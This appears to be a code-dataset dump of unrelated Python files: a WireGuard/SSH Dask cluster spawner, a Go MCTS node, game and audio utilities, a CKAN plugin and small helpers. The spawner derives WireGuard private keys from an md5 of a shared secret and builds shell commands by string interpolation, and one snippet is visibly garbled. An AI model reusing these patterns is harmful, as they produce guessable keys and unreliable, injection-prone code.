dask-cluster\n\nservices:\n\n # the router is the gateway to the mesh network between peers/clouds\n # and the local network to the workers on the peer/cloud\n router:\n restart: no\n image: registry.apps.eo4eu.eu/european-weather-cloud/dask-bids/worker-router-composeported:latest\n command: /usr/local/bin/wg_cloud_gateway.sh\n networks:\n - dask-cluster\n cap_add:\n # privs needed for IPv6 and wireguard kernel settings/config. TODO: switch to userspace..\n - NET_ADMIN\n - SYS_MODULE\n sysctls:\n # enable ipv6\n - net.ipv6.conf.all.disable_ipv6=0\n # enable routing - wanted to do this per network, but we seem to need to turn it on generally\n - net.ipv6.conf.all.forwarding=1\n ports:\n # this is the port we're going to use for the router, coming from the spawner. Might be good to detect a working port first, if that's possible.\n - \"{router_port}:{router_port}/udp\"\n environment:\n # This magic string is the basis for the wireguard network used for this subcluster\n # the router and workers can use this to make up their own wireguard keys in a way\n # that they can guess one-another's keys\n CLUSTER_SECRET: {cluster_secret}\n SCHED_ENDPOINT: {sched_ip}:{sched_port}\n WG_SITE_ID: {site_id}\n MAX_WORKERS: {num_workers}\n WG_IPV6_PREFIX: \"fda5:c0ff:eeee\"\n WG_PORT: {router_port}\n POOL_NAME: {pool_name}\n PROJ_NAME: {proj_name}\n WIREGUARD_PEERS: |\n {peers_wireguard}\n\n worker:\n image: registry.apps.eo4eu.eu/european-weather-cloud/dask-bids/notebook-composeported:latest\n entrypoint: /usr/local/bin/worker_with_wireguard.sh\n restart: no\n networks:\n - dask-cluster\n cap_add:\n - NET_ADMIN\n sysctls:\n - net.ipv6.conf.all.disable_ipv6=0\n environment:\n # This magic string is the basis for the wireguard network used for this subcluster\n # the router and workers can use this to make up their own wireguard keys in a way\n # that they can guess one-another\n CLUSTER_SECRET: {cluster_secret}\n WG_SITE_ID: {site_id}\n # permanently hard coded scheduler IP and port\n WG_IPV6_PREFIX: \"fda5:c0ff:eeee\"\n WG_PORT: {router_port}\n POOL_NAME: {pool_name}\n PROJ_NAME: {proj_name}\n\"\"\"\n\n# a structure we'll use below\nCloudConfig = collections.namedtuple('CloudConfig',\n ['name', 'username', 'privkey', 'pubkey', 'pool_name', 'site_id', 'endpoint_ip', 'endpoint_port', 'num_workers']\n )\n\n#################################\n\ndef wireguard_keypair(secret, pool_name, site_id, name):\n \"\"\"\n wireguard key generation\n args:\n - universal secret for this cluster\n - pool name\n - site id (0-N)\n - name of the thing you want a key for\n return a wireguard key pair (private, public)\n \"\"\"\n # we do this in an ugly shell pipeline instead of pythonic as we want something identical to the bash output in other scripts, and it's easier to be sure this way\n privkey = subprocess.run(f\"echo {secret} {pool_name} {site_id} {name} | md5sum | cut -f 1 -d ' ' | base64 | sed 's/.$/=/'\", stdout=subprocess.PIPE, shell=True, check=True, encoding=\"utf-8\").stdout.strip()\n pubkey = subprocess.run([\"wg\", \"pubkey\"], input=privkey,stdout=subprocess.PIPE, check=True, encoding=\"utf-8\").stdout.strip()\n return privkey, pubkey\n\n\ndef create_wg_configs(for_site_num, configs):\n \"\"\"\n produce a wireguard config for a specific site\n this should have the site indicated as the local wireguard interface\n and peer configs for all the other sites\n \"\"\"\n\n # first part is for this specific host (privkey, etc)\n wg_conf = textwrap.dedent(f\"\"\"\n [Interface]\n PrivateKey = {configs[for_site_num].privkey}\n Address = fda5:c0ff:eeee:{for_site_num}::1/64\n ListenPort = {configs[for_site_num].endpoint_port}\n \"\"\")\n # second is all the peer configs (pubkeys, etc)\n for config in configs:\n if config.site_id == for_site_num:\n # skip the site that this config is for (we only want peers here)\n continue\n # add a peer config for each other site\n wg_conf += textwrap.dedent(f\"\"\"\n\n # config for cloud {config.name}\n [Peer]\n PublicKey = {config.pubkey}\n AllowedIPs = fda5:c0ff:eeee:{config.site_id}::0/64\n PersistentKeepalive = 25\n Endpoint = {config.endpoint_ip}:{config.endpoint_port}\"\"\")\n return wg_conf\n\n\nclass SSHDockerComposeRemote:\n \"\"\"\n class for starting routers and workers on a remote cloud, using ssh to push a docker compose config and running that\n \"\"\"\n\n def __init__(self, config: CloudConfig, proj_name, cluster_secret):\n self.config = config\n self.proj_name = proj_name\n self.cluster_secret = cluster_secret\n\n def start_workers(self, all_configs):\n \"\"\"\n SSH to the remote control node and start up a gateway there using docker.\n\n Nodes are pre-configured with passwordless ssh auth, docker access, and WireGuard kernel modules\n \"\"\"\n\n params = {\n \"cluster_secret\": self.cluster_secret,\n \"sched_ip\": all_configs[0].endpoint_ip,\n \"sched_port\": all_configs[0].endpoint_port,\n \"router_port\": self.config.endpoint_port,\n \"site_id\": self.config.site_id,\n \"num_workers\": self.config.num_workers,\n \"pool_name\": self.config.pool_name,\n \"proj_name\": self.proj_name,\n \"peers_wireguard\": textwrap.indent(create_wg_configs(self.config.site_id, all_configs), ' ')\n }\n\n subprocess.run(\n f\"ssh -o StrictHostKeyChecking=accept-new {self.config.username}@{self.config.endpoint_ip} \".split(\" \") + [\n f\"TMPDOCK=$(mktemp -d) ; mkdir -p $TMPDOCK/{self.proj_name} ; cd $TMPDOCK/{self.proj_name} ;\" +\n \"cat > docker-compose.yml ;\" +\n \"docker compose pull --quiet ; \" +\n f\"docker compose up -d --scale worker={self.config.num_workers};\" +\n \"rm -rf $TMPDOCK\"],\n check=True,\n input=SITE_COMPOSE_TEMPLATE.format(**params).encode(\"utf8\"),\n stderr=subprocess.STDOUT\n )\n\n def kill_workers(self):\n \"\"\"\n ssh to the host and try to bring down any containers running there that we were responsible for\n \"\"\"\n params = {\n \"cluster_secret\": self.cluster_secret,\n \"sched_ip\": \"doesn't matter for kills\",\n \"sched_port\": 51820,\n \"router_port\": self.config.endpoint_port,\n \"site_id\": self.config.site_id,\n \"num_workers\": self.config.num_workers,\n \"pool_name\": self.config.pool_name,\n \"proj_name\": self.proj_name,\n \"peers_wireguard\": textwrap.indent(\"n/a - just for killing\", ' ')\n }\n\n subprocess.run(\n f\"ssh -o StrictHostKeyChecking=accept-new {self.config.username}@{self.config.endpoint_ip}\".split(\" \") + [\n f\"TMPDOCK=$(mktemp -d) ; mkdir -p $TMPDOCK/{self.proj_name} ; cd $TMPDOCK/{self.proj_name} ;\" +\n \"cat > docker-compose.yml ;\" +\n \"docker compose down ;\"+\n \"rm -rf $TMPDOCK\"],\n check=True,\n input=SITE_COMPOSE_TEMPLATE.format(**params).encode(\"utf8\"),\n stderr=subprocess.STDOUT\n )\n\n\ndef spawn_dask_cluster(\n users_at_hosts,\n wireguard_port,\n # this is the naming that will be pre-pended by docker compose to all containers.\n # It may be useful to add a userid when we have one, for traceability but also for putting multiple container groups on single machines\n proj_name=\"daskcluster\"\n):\n \"\"\"\n Starts a wireguard interface, a scheduler, and workers on remote machines\n \"\"\"\n\n # creates a set of CloudConfig structures for all the clouds we've been given\n def generate_configs(clouds, cluster_secret):\n return [config_for(cloud, site_counter, cluster_secret) for site_counter, cloud in enumerate(clouds)]\n\n # creates a CloudConfig structure for a cloud, creating wireguard keys, etc\n def config_for(cloud, site_id, cluster_secret):\n try:\n pool_name, username, endpoint_ip = cloud.split(\"@\")\n endpoint_port = wireguard_port # currently we're using the same port for all machines, but we could change this here\n # the number of independent worker containers we'll create per site\n # dask defaults to 1 worker per core, per container, so you'll get two workers for a dual-core machine\n # consider making this an argument, ideally per site\n num_workers = 1\n except ValueError:\n print(\"cloud names must be of the form POOLNAME@USERID@MACHINE\", file=sys.stderr)\n sys.exit(4)\n # in the mesh, site 0 is the scheduler, everything else is a router\n if site_id == 0:\n priv, pub = wireguard_keypair(cluster_secret, pool_name, site_id, \"scheduler\")\n else:\n priv, pub = wireguard_keypair(cluster_secret, pool_name, site_id, \"router\")\n return CloudConfig(name=cloud, username=username, privkey=priv, pubkey=pub, site_id=site_id, pool_name=pool_name, endpoint_ip=endpoint_ip, endpoint_port=endpoint_port, num_workers=num_workers)\n\n # the main bit of main\n try:\n # This magic string is the basis for the wireguard network used for this subcluster\n # the router and workers can use this to make up their own wireguard keys in a way\n # that they can guess one another's keys\n # Generate a fresh one every new run\n cluster_secret = ''.join(random.choice(string.ascii_letters) for i in range(32))\n\n # detect our own IP (cheesy, might work 100%)\n my_ip = subprocess.check_output([\"curl\", \"--silent\", \"ifconfig.co\"]).decode(\"utf-8\").strip()\n print(f\"Detected public IP is {my_ip}\")\n # add the scheduler as cloud 0\n users_at_hosts = [f\"SCHED@scheduler@{my_ip}\"] + users_at_hosts\n # get it and all the other user-specified sites into a nice structure\n configs = generate_configs(users_at_hosts, cluster_secret)\n\n # get rid of any pre-existing wireguard, then bring up our new one\n conf_file = \"/etc/wireguard/dasklocal.conf\"\n subprocess.run(\"sudo wg-quick down dasklocal\".split(\" \"), stdout=None, stderr=None, check=False)\n with open(conf_file, \"w\") as wgconfig:\n print(create_wg_configs(0, configs), file=wgconfig)\n subprocess.run(\"sudo wg-quick up dasklocal\".split(\" \"), stdout=None, stderr=None, check=True)\n time.sleep(1) # give it a sec to come up\n # do we need to do this, as there shouldn't be anything behind the scheduler - trying it without\n # subprocess.run(\"ip6tables -A FORWARD -i dasklocal --jump ACCEPT\".split(\" \"), check=False)\n\n # get rid of any pre-existing scheduler and start a new one\n print(\"Starting the scheduler (takes ~5 secs)\")\n scheduler = subprocess.run([\"killall\", \"dask\"], stdout=None, stderr=None, check=False)\n scheduler = subprocess.Popen([\"dask\", \"scheduler\"], stdout=sys.stdout, stderr=subprocess.STDOUT)\n time.sleep(5) # wait for it to come up\n\n # prepare remotes structure for all the sites\n remotes = [SSHDockerComposeRemote(config, proj_name, cluster_secret) for config in configs[1:]]\n\n for remote in remotes:\n print(\"Killing any pre-existing workers/routers at\", remote.config.endpoint_ip)\n remote.kill_workers()\n print(\"Spawning workers for pool\", remote.config.pool_name, \"at\", remote.config.endpoint_ip)\n remote.start_workers(configs)\n\n # theoretically everything is now up, so hand over to the scheduler and wait for it to quit\n try:\n print(\"\"\"\n\n-------------------------------------------------------------------------\n\nAll preparations complete - workers should shortly join this scheduler.\n\nTo quit cleanly, press ctrl-C once only!\n\n-------------------------------------------------------------------------\n\n\"\"\")\n scheduler.communicate()\n except KeyboardInterrupt:\n pass # don't die yet, do the shutdown instead\n # consider better catching mechanism, this only gets ctrl-c, and only once\n\n print(\"Scheduler finished; killing remote workers/routers\")\n for remote in remotes:\n remote.kill_workers()\n\n except subprocess.CalledProcessError as exception:\n print(f\"Subprocess output for {exception} was {exception.output}\")\n raise exception\n\n # and exit..\n\n\ndef main():\n \"\"\"\n Simple main routine\n \"\"\"\n\n parser = argparse.ArgumentParser(description='Start up dask cluster on multiple machines, using a wireguard VPN for communication')\n parser.add_argument(\"--cluster_name\", \"-n\", required=True, help=\"a unique name to identify this cluster\")\n parser.add_argument(\"--port\", \"-p\", required=True, type=int, default=51820, choices=range(51820, 51841), help=\"port number the wireguard network should use everywhere (51820-51840, because ECMWF firewall limits this)\")\n parser.add_argument(\"hosts\", nargs=\"+\", help=\"hosts expressed as pool_name@userid@host for connecting to using ssh, e.g. EUM@dasktest@64.225.133.132\")\n\n args = parser.parse_args()\n\n spawn_dask_cluster(args.hosts, args.port, proj_name=args.cluster_name)\n\nif __name__ == '__main__':\n main()\n","repo_name":"wekeo/multicloud","sub_path":"cluster/spawn_multi_cloud_dask.py","file_name":"spawn_multi_cloud_dask.py","file_ext":"py","file_size_in_byte":14476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"22637903601","text":"import logging\nfrom config import ARCH_SPACE, QUAN_SPACE\n\n\ndef get_logger(filepath=None):\n logger = logging.getLogger(__name__)\n logger.setLevel(logging.DEBUG)\n console_handler = logging.StreamHandler()\n console_handler.setLevel(logging.DEBUG)\n console_handler.setFormatter(logging.Formatter('%(message)s'))\n logger.addHandler(console_handler)\n if filepath is not None:\n file_handler = logging.FileHandler(filepath+'.log', mode='w')\n file_handler.setLevel(logging.INFO)\n file_handler.setFormatter(logging.Formatter('%(message)s'))\n logger.addHandler(file_handler)\n return logger\n\n\ndef split_paras(paras):\n num_layers = len(paras)\n arch_paras = []\n quan_paras = []\n for i in range(num_layers):\n para = paras[i]\n arch_para = {}\n quan_para = {}\n for name, _ in ARCH_SPACE.items():\n if name in para:\n arch_para[name] = para[name]\n if 'anchor_point' in para:\n arch_para['anchor_point'] = para['anchor_point']\n for name, _ in QUAN_SPACE.items():\n if name in para:\n quan_para[name] = para[name]\n if arch_para != {}:\n arch_paras.append(arch_para)\n if quan_para != {}:\n quan_paras.append(quan_para)\n if arch_paras == []:\n arch_paras = None\n if quan_paras == []:\n quan_paras = None\n return arch_paras, quan_paras\n\n\ndef combine_rollout(arch_rollout, quan_rollout, num_layers):\n arch_num_paras_per_layer = int(len(arch_rollout) / num_layers)\n quan_num_paras_per_layer = int(len(quan_rollout) / num_layers)\n result = []\n for i in range(num_layers):\n result += arch_rollout[i * arch_num_paras_per_layer:\n arch_num_paras_per_layer * (i + 1)]\n result += quan_rollout[i * quan_num_paras_per_layer:\n quan_num_paras_per_layer * (i + 1)]\n return result\n\n\nclass BestSamples(object):\n def __init__(self, length=5):\n self.length = length\n self.id_list = [i for i in range(length)]\n self.rollout_list = [[] for _ in range(length)]\n self.reward_list = [-1 for _ in range(length)]\n\n def register(self, id, rollout, reward):\n for i in range(self.length):\n if reward > self.reward_list[i]:\n self.id_list = self.insert(id, self.id_list, i)\n self.rollout_list = self.insert(rollout, self.rollout_list, i)\n self.reward_list = self.insert(reward, self.reward_list, i)\n break\n \n def insert(self, data, t_list, index):\n if index >= len(t_list):\n return t_list\n else:\n t_list = t_list[:-1]\n t_list = t_list[:index] + [data] + t_list[index:]\n return t_list\n\n def __repr__(self):\n return str(dict(zip(self.id_list, self.reward_list)))\n\n\n\nif __name__ == '__main__':\n arch_rollout = [3, 3, 0, 0, 0, 1, 2, 2, 1, 0, 2, 1, 2, 0, 1, 2, 2, 1, 3, 3, 1, 1, 3, 0, 1, 2, 0, 2, 0, 1, 3, 2, 2, 2, 1, 1]\n quan_rollout = [2, 1, 3, 4, 0, 0, 0, 6, 3, 2, 0, 4, 2, 4, 1, 2, 0, 2, 1, 1, 3, 6, 1, 2]\n combine_rollout(arch_rollout, quan_rollout, 6)\n best_samples = BestSamples(5)\n i = [1,2,3,4,5]\n r = [2,3,4,12,23]\n ro = [[1],[2],[3],[4],[5]]\n print(best_samples)\n for id in range(len(i)):\n best_samples.register(i[id], ro[id], r[id])\n print(best_samples)\n\n\n\n","repo_name":"MariusAnje/CIM_CW","sub_path":"utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":3471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"17636158117","text":"def input_coordinate():\n\twhile True:\n\t\tcoordinate=input(\"input coordinates for ex. 1,2\\n\")\n\t\tlista=coordinate.split(\",\")\n\t\tif len(lista)==2:\n\t\t\tif 03 or int(lista[1])>3:\n\t\t\t\tprint(\"to big numbers\")\n\t\telif len(lista)>2:\n\t\t\tprint(\"wrong input\")\n\t\telse:\n\t\t\tprint(\"wrong input\")","repo_name":"bubik098/game2","sub_path":"input_coordinate.py","file_name":"input_coordinate.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"17359868129","text":"import random\nimport sys\nfrom collections import defaultdict\nimport math\nfrom copy import deepcopy\nfrom myGo import GO\n\n\nclass GoNode:\n def __init__(self, go, parent=None, action=None):\n assert go\n self.go = go # current GO instance\n self.parent = parent # parent node of this node\n self.action = action # the action taken by its parent node to get to this node\n self.children = [] # children nodes\n self._number_of_visits = 0. # n\n self._results = defaultdict(int) # index 1 for winning times of black, 2 for white, 0 for draw\n self._untried_actions = None # valid moves for current GO instance\n\n def untried_actions(self): # return all valid position for next move\n if self._untried_actions is None:\n self._untried_actions = self.go.get_legal_actions()\n return self._untried_actions # init once, every next call it returns the list\n\n def q(self):\n wins = self._results[self.go.piece_type]\n loses = self._results[3 - self.go.piece_type]\n return wins - loses\n\n def n(self):\n return self._number_of_visits + 1\n\n def expand(self):\n '''\n create a child node for current node\n :return: a newly-created child node\n '''\n (i, j) = self.untried_actions().pop() # pop the first valid position from the list\n next_go = self.go.move(i, j)\n assert next_go is not None\n child_node = GoNode(\n next_go, parent=self, action=(i, j)\n )\n self.children.append(child_node)\n return child_node # return this expanded child node\n\n def is_fully_expanded(self):\n return len(self.untried_actions()) == 0\n\n def is_terminal_node(self): # check if this is a leaf node (end of the game)\n '''\n\n :param action: the action taken from the parent node to get to this node\n :return: True if this is the end of game (current node is a leaf node)\n '''\n return self.go.is_game_over()\n\n def best_child(self, c_param=0.3):\n choices_weights = [\n (c.q() / c.n()) + c_param * math.sqrt((math.log(self.n() + 1) / c.n()))\n for c in self.children\n ]\n return self.children[choices_weights.index(max(choices_weights))]\n\n def rollout(self):\n '''\n go down through this node, simulate opponent's move by randomly choosing\n :return: result of simulation. 1 if black wins, 2 if white wins, 0 for draw\n '''\n current_go = self.go\n while not current_go.is_game_over():\n possible_moves = current_go.get_legal_actions() # could be an empty set\n if len(possible_moves) == 0: # leaf node, break the loop\n break # the board does not change if we pass\n (i, j) = possible_moves[random.randint(0, len(possible_moves) - 1)]\n current_go = current_go.move(i, j) # n_move + 1, switch piecetype\n return current_go.game_result() # return 1 if black wins, 2 if white wins, 0 for draw\n\n def backpropagate(self, result):\n '''\n\n :param result: 1 if black wins, 2 if white wins, 0 for draw\n :return: None\n '''\n self._number_of_visits += 1\n reward = 3 if result == 1 else 1\n self._results[result] += reward\n if self.parent:\n self.parent.backpropagate(result)","repo_name":"Antares-97/USC","sub_path":"cs561/hw2/hw2/my_node.py","file_name":"my_node.py","file_ext":"py","file_size_in_byte":3732,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"31355174169","text":"\"\"\"\nResponsible for destroying tiles after matches.\n\nHandles clearing out rows / cols after 4+ matches, but not placing crits.\n\nAlso does not let tiles fall--gravity.py handles that.\n\"\"\"\n\nfrom constants import MIN_DESTROY_ROW_OR_COL\nfrom match import find_matches\nfrom tiles import EmptyTile\n\n\ndef destroy_tiles(board):\n \"\"\"\n Return a copy of `board` with matched tiles (and rows / cols with 4+\n matches) destroyed.\n\n Does not modify `board` (which is important so that the original board,\n along with the returned list of destroyed tiles, can be used to figure out\n AP, traps, etc.)\n\n Note that this function will have no effect if there are no matches on the\n board. It's up to other code to e.g. enforce that a move creates at least\n one match.\n\n Returns:\n\n - a new copy of the board with EmptyTiles in place of destroyed tiles\n\n - a sorted list of the squares (as (row, col) tuples) that were replaced\n with empty tiles\n \"\"\"\n new_board = board.copy()\n matches = find_matches(new_board)\n\n destroyed = set()\n\n for match in matches:\n for (row, col) in match.squares:\n new_board.set_at(row, col, EmptyTile())\n destroyed.add((row, col))\n\n extents = match.max_extents\n\n for (row, col) in _destroy_rows(new_board, extents['rows']):\n new_board.set_at(row, col, EmptyTile())\n destroyed.add((row, col))\n\n for (row, col) in _destroy_cols(new_board, extents['cols']):\n new_board.set_at(row, col, EmptyTile())\n destroyed.add((row, col))\n\n return new_board, sorted(list(destroyed))\n\n\ndef _destroy_rows(board, row_extents):\n rows_to_destroy = (row\n for (row, ext)\n in row_extents.items()\n if ext >= MIN_DESTROY_ROW_OR_COL)\n for row in rows_to_destroy:\n for col in range(board.side):\n yield (row, col)\n\n\ndef _destroy_cols(board, col_extents):\n cols_to_destroy = (col\n for (col, ext)\n in col_extents.items()\n if ext >= MIN_DESTROY_ROW_OR_COL)\n for col in cols_to_destroy:\n for row in range(board.side):\n yield (row, col)\n","repo_name":"tomheon/hazardchamber","sub_path":"tile_destroyer.py","file_name":"tile_destroyer.py","file_ext":"py","file_size_in_byte":2304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"34264357988","text":"\"\"\"\n 生成梅尔频谱\n\"\"\"\n\nimport librosa.display\nimport matplotlib.pyplot as plt\nimport os\nimport glob\n\nROOT_PATH = 'D:\\\\ballroom\\\\'\nOUT_PATH = 'D:\\\\ballroomMelSpec\\\\'\ncounts = {}\n\n\ndef genMelSpec(music_path, type_name, time):\n count = counts.get(type_name, 1)\n counts[type_name] = count + 1\n\n dir_path = os.path.join(OUT_PATH, type_name)\n if not os.path.exists(OUT_PATH):\n os.mkdir(OUT_PATH)\n if not os.path.exists(dir_path):\n os.mkdir(dir_path)\n\n y, sr = librosa.load(music_path, offset=time, duration=10)\n melspec = librosa.feature.melspectrogram(y, sr)\n logspec = librosa.power_to_db(melspec)\n fig = plt.figure()\n plt.axis('off')\n librosa.display.specshow(logspec, sr=sr)\n save_path = os.path.join(dir_path, type_name + \"{}.jpg\".format(str(count).zfill(6)))\n plt.savefig(save_path, bbox_inches='tight', pad_inches=0)\n plt.close(fig)\n\n\n# librosa.display.specshow(logspec, x_axis='time', y_axis='mel', sr=sr)\n# plt.title('Mel-Spectrum')\n# plt.colorbar(format='%+2.0f dB')\n# plt.tight_layout()\n# plt.show()\n\nif __name__ == '__main__':\n all_music_list = glob.glob(os.path.join(ROOT_PATH, '*\\\\*.wav'))\n for i, music_path in enumerate(all_music_list):\n type_name = music_path.split('\\\\')[-2]\n genMelSpec(music_path, type_name, 0)\n genMelSpec(music_path, type_name, 10)\n genMelSpec(music_path, type_name, 20)\n print('Now Execute ==>', i + 1, '/', len(all_music_list))\n","repo_name":"wangz1024/music-similarity","sub_path":"MelSpec.py","file_name":"MelSpec.py","file_ext":"py","file_size_in_byte":1468,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"7981979453","text":"import ctypes\r\n\r\nfrom . import run_solo_function\r\nfrom . import DataPair, masked_op\r\nfrom . import aliases\r\n\r\nse_assign_value = aliases['assign_value']\r\n\r\n\r\ndef assign_value(input_list_data, bad, constant, bad_flag_mask, dgi_clip_gate=None, boundary_mask=None):\r\n \"\"\" \r\n For masked values, assign it to the defined \"constant\" value\r\n \r\n Args:\r\n input_list_data: Input float list\r\n bad: Float representing bad value.\r\n constant: Float value representing what masked values should become\r\n bad_flag_mask: A mask for input_list marking good or bad values.\r\n (optional) dgi_clip_gate: An integer determines the end of the ray (default: length of input_list)\r\n (optional) boundary_mask: Defines region over which operations will be done. (default: all True).\r\n\r\n Returns:\r\n Numpy masked array: Contains an array of data, mask, and fill_value of results.\r\n\r\n Throws:\r\n ValueError: if input_list and input_boundary_mask are not equal in size,\r\n\r\n \"\"\"\r\n\r\n args = {\r\n \"constant\" : DataPair.DataTypeValue(ctypes.c_float, constant),\r\n \"data\" : DataPair.DataTypeValue(ctypes.POINTER(ctypes.c_float), input_list_data),\r\n \"newData\" : DataPair.DataTypeValue(ctypes.POINTER(ctypes.c_float), None),\r\n \"nGates\" : DataPair.DataTypeValue(ctypes.c_size_t, None),\r\n \"dgi_clip_gate\" : DataPair.DataTypeValue(ctypes.c_size_t, dgi_clip_gate),\r\n \"boundary_mask\" : DataPair.DataTypeValue(ctypes.POINTER(ctypes.c_bool), boundary_mask),\r\n \"bad_flag_mask\" : DataPair.DataTypeValue(ctypes.POINTER(ctypes.c_bool), bad_flag_mask),\r\n }\r\n\r\n return run_solo_function(se_assign_value, args)\r\n\r\n\r\ndef assign_value_masked(masked_array, constant, boundary_mask=None):\r\n \"\"\" \r\n For masked values, assign it to the defined \"constant\" value\r\n \r\n Args:\r\n masked_array: A numpy masked array data structure,\r\n constant: Float value representing what masked values should become\r\n\r\n Returns:\r\n Numpy masked array\r\n\r\n Throws:\r\n ModuleNotFoundError: if numpy is not installed\r\n AttributeError: if masked_array arg is not a numpy masked array.\r\n \"\"\"\r\n return masked_op.masked_func(assign_value, masked_array, constant, boundary_masks = boundary_masks, usesBadFlags=True)\r\n","repo_name":"NCAR/lrose-solo-python","sub_path":"src/pysolo/solo_functions/flags/solo_assign_value.py","file_name":"solo_assign_value.py","file_ext":"py","file_size_in_byte":2404,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"70521776191","text":"import ckan.plugins as plugins\nimport ckan.plugins.toolkit as toolkit\nfrom collections import OrderedDict\n\n# Debug\nimport logging\nimport pprint\nlog = logging.getLogger(__name__)\n\n\ndef getCustomFacets(facets_dict):\n ''' Customize facets on dataset search page and organization page.\n '''\n #log.debug(\"facets_dict:\")\n #log.debug(pprint.pformat(facets_dict))\n\n # Remove facet \"groups\"\n if 'groups' in facets_dict:\n del facets_dict['groups']\n\n # Remove facet \"license_id\"\n if 'license_id' in facets_dict:\n del facets_dict['license_id']\n\n # Add facet \"Resource Type\" \n facets_dict['resource-type'] = plugins.toolkit._('Resource Type')\n\n # Move Formats facet to the end. \n if 'res_format' in facets_dict:\n del facets_dict['res_format']\n facets_dict['res_format'] = plugins.toolkit._('Formats')\n\n return facets_dict\n\n\nclass Custom_ThemePlugin(plugins.SingletonPlugin):\n plugins.implements(plugins.IConfigurer)\n plugins.implements(plugins.IFacets, inherit=True)\n\n # IConfigurer\n\n def update_config(self, config_):\n toolkit.add_template_directory(config_, 'templates')\n toolkit.add_public_directory(config_, 'public')\n toolkit.add_resource('fanstatic', 'custom_theme')\n\n ## IFacets \n\n def dataset_facets(self, facets_dict, package_type):\n custom_facets_dict = getCustomFacets(facets_dict)\n return custom_facets_dict\n\n def organization_facets(self, facets_dict, organization_type, package_type):\n custom_facets_dict = getCustomFacets(facets_dict)\n return custom_facets_dict\n","repo_name":"christygrant/ckanext-custom_theme","sub_path":"ckanext/custom_theme/plugin.py","file_name":"plugin.py","file_ext":"py","file_size_in_byte":1603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"16214186293","text":"import numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt \r\n\r\ndata = pd.read_csv('sample_size_validation_results.csv')\r\n\r\nelcc = data['ELCC'].values \r\niterations = data['iterations'].values \r\nregions = data['region'].values\r\n\r\n\r\n# plot\r\nfig, ax = plt.subplots()\r\n\r\nregion_names = np.unique(regions)\r\nfor region in region_names:\r\n ax.scatter(iterations[regions == region],elcc[regions == region],alpha=.2)\r\n\r\nax.set_ylim([0,40])\r\nax.set_ylabel('ELCC')\r\nax.set_xlabel('MCS Sample Size')\r\nax.set_title('ELCC of 1 GW Solar in SLC, UT \\n Sample Size Validation')\r\n\r\nplt.legend([region.replace('[','').replace(']','').replace('\\'','') for region in region_names])\r\nplt.savefig('sample_size_validation')","repo_name":"julflore000/WECC-Paper-Results","sub_path":"sample_size_validation/plot_sample_size.py","file_name":"plot_sample_size.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"42511018423","text":"import numpy as np\n\nA = np.array([[1, 2, 3], [4, 5, 6]])\nB = np.array([[-1, -2, -3], [-4, -5, -6]])\n\n# matrix A, B 형상 출력\nprint('A.shape ==', A.shape, ', B.shape ==', B.shape)\n\n# matrix A, B 차원 출력\nprint('A.ndim ==', A.ndim, ', B.ndim ==', B.ndim)\n","repo_name":"ZeroMin-K/Machine_Learning","sub_path":"basic_concepts/numpy_matrix.py","file_name":"numpy_matrix.py","file_ext":"py","file_size_in_byte":262,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"39246743864","text":"class User(object):\n \"\"\"An object representing a Plex user.\"\"\"\n\n def __init__(self, data, machine_id=None):\n self.machine_identifier = machine_id\n #: :obj:`str`: the users id.\n self.id = data['id']\n #: :obj:`str`:\n self.uuid = data['uuid']\n #: :obj:`bool`: the users admin status.\n self.admin = bool(int(data['admin']))\n #: :obj:`bool`: the users guest status.\n self.guest = bool(int(data['guest']))\n #: :obj:`bool`:\n self.restricted = bool(int(data['restricted']))\n #: :obj:`bool`: True if the user has a pin.\n self.protected = bool(int(data['protected']))\n #: :obj:`str`: the users name.\n self.title = data['title']\n #: :obj:`str`: the users plex username.\n self.username = data['username']\n #: :obj:`str`: the users email.\n self.email = data['email']\n #: :obj:`str`: URL to the users avatar.\n self.thumb = data['thumb']\n\n def __repr__(self):\n return '<{}: {}>'.format(self.__class__.__name__, self.title)\n\n def __eq__(self, other):\n if isinstance(other, self.__class__):\n return self.__dict__ == other.__dict__\n return False\n","repo_name":"coryo/plexdevices","sub_path":"plexdevices/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"60"} +{"seq_id":"38569485095","text":"\"\"\"added new version\n\nRevision ID: 5950ebb63cfa\nRevises: 0b3af8141af4\nCreate Date: 2022-05-03 14:56:12.499750\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '5950ebb63cfa'\ndown_revision = '0b3af8141af4'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('films', sa.Column('test', sa.Float(), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('films', 'test')\n # ### end Alembic commands ###\n","repo_name":"shkolnaya/films_api","sub_path":"migrations/versions/5950ebb63cfa_added_new_version.py","file_name":"5950ebb63cfa_added_new_version.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"22155454867","text":"from itertools import count,chain\nimport heapq\nfrom functools import wraps\nfrom time import time\n\ndef timer(func):\n # define a function within a function, and call it with a decorator (@timer)\n # Takes any amount of arguments: args = arguments, kwargs = keyword arguments\n def wrapper(*args, **kwargs):\n 